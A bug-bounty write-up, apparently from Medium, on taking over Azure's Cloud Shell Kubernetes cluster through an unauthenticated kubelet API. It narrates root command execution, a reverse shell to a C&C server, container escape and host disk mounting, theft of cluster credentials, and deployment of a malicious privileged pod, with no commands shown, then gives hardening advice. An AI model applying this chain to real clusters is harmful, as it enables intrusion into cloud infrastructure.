I Own your Cloud Shell: Taking over “Azure Cloud Shell” Kubernetes Cluster Through Unsecured Kubelet API 30,000$ Bounty

User requests Cloud Shell through Azure Portal
1. Client request Cloud Shell via Azure Portal 2. Random Kubernetes cluster is chosen 3. free node in the cluster is assigned for the client 4. Container is created on the node with the client token, allows the user to control all of his Azure Resources
After checking the current control group, I found out that Cloud Shell is running on Kubernetes. that gave me a path to start digging for containers/Kubernetes related issues.
I tried to communicate with different known API’s used by Kubernetes and docker, I started with the docker remote API which most of the time (if not listens on a UNIX socket) listens on ports 2375 or 2376(if used with HTTPs, most of the times). the ports were closed.
The read-only port was used in the past for health checks and is now disabled by default on newer Kubernetes releases. By calling this port, one can leak information about pods/namespaces in use and it’s running container names, pod names, host IP address and more.
Viola! I was surprised to see that the port is accessible without any authentication.
The response means that the kubelet port is secured. AKS clients can be relaxed.

HACK 1: Rooting my own “Azure Cloud Shell” Container

The output of the command is a 302 Page status code, that means that a redirect needs to be done. Unfortunately, curl doesn’t know how to handle these 302 redirects as the next page “/cri/exec/HnPxVYzr” must be handled with “Websocket” and curl don’t have this feature yet. if the redirect is not executed, the command will fail to run.
The “hello_world” file created through the kubelet API with “root” User as owner.
  1. Created a file named reverse.sh in the /tmp directory with the following payload:
The connection established to my C&C server with root privileges on the “Azure Cloud Shell” container (which I should have had low-privileged access).

HACK 2:Breaking out of the Container and Getting root on the Host(node) of Azure’s Infrastructure

My guess was correct, the console-admin container is based on Alpine Linux. (And also, the repositories were updated).
C&C server received the connection from the privileged “console-admin” container.
Mounting the host primary disk(/dev/sda1) into /mnt3/ directory and displaying the hostname of the host(node) of Azure’s Infrastructure.
Azure’s Cloud Shell Kubernetes cluster credentials
Using the credentials to list pods and nodes in the cluster
  • A “Malicious” container Image that on init will connect to C&C server
  • Privileged flag, in order to have all the kernel Capabilities on the POD
  • “nodeSelctor” flag, that allows a user to choose a specific node to schedule his pod on.
  • On the left, I use node #0 kubelet creds in order to deploy a pod with a malicious Image, privileged flag, and selecting specific node (#2).
  • On the right, in 01:45 the pod was successfully deployed on that specific node, and connected to the C&C server, have all the kernel capabilities, and mounts the node #2 filesystem.

HACK3: LPE on any container in “Azure Container Instance”

POC: Local privilege escalation through the kubelet API, on Azure Container Instance, here I used another method which does not require websockets redirect, and the output displayed right away. I used the “id” and “whoami” on the same container, and the output was root and id 0.
  1. Block network connection between containers(pods) and host(nodes) That can be done through IPtables.
  2. Use a different IP for the node instead of 172.17.0.1, by default when installing docker on a host, it creates a new network interface with the ip 172.17.0.1, someone with a little knowledge with docker containers can guess that this is the IP of the node very easily.
  3. Disable the read-only 10255 Port (which was used for “health” check in the past and is not needed anymore).
  4. Secure the 10250 (Kubelet execution port) by running the kubelet API with the flag “anonymous-auth false” and a certificate
  5. Block outbound connections for “suspicious” ports — I was able to create outbound connection from the pods to my server (on a different cloud provider) on port 4444.
  6. Remove the Privileged flag from the console-admin container, instead you can build a “seccomp” profile(https://docs.docker.com/engine/security/seccomp/) and attach it to the container, in order to minimize the container access to the kernel capabilities.

--

--

--

Penetration Tester @eBay

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Fix the Notebooks gone problem of Evernote v10.7.6 on macOS 10.11.6+

Cache Warming and It’s Importance

So it’s not Scrum

Elephants showing us their butts.

Blockmine x Apeswap: NFA Utilities

MongoDB CRUD with Python

Which is better bluehost or hostgator?

How I Utilize Docker for Flutter

TryHackMe — Network Service 1

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Chen Cohen

Chen Cohen

Penetration Tester @eBay

More from Medium

What Is GitOps?

Configuring Kubernetes Cluster with Terraform and Ansible

Cloud-Native Security For DevOps

Kubernetes Blue-Green Deployment